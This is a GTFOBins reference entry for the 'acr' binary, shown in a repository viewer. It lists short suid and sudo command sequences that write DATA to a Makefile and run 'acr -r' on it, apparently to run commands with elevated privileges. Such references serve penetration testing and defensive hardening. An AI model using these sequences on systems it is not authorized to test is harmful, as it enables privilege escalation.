GTFOBins.github.io/_gtfobins/acr.md

16 lines
342 B
Markdown
Raw Normal View History

---
functions:
suid:
- code: |
sudo install acr $(which acr) .
touch Makefile && chmod + Makefile
echo DATA > Makefile
./acr -r Makefile
sudo:
- code: |
sudo install acr $(which acr) .
touch Makefile && chmod + Makefile
echo DATA > Makefile
sudo acr -r Makefile
---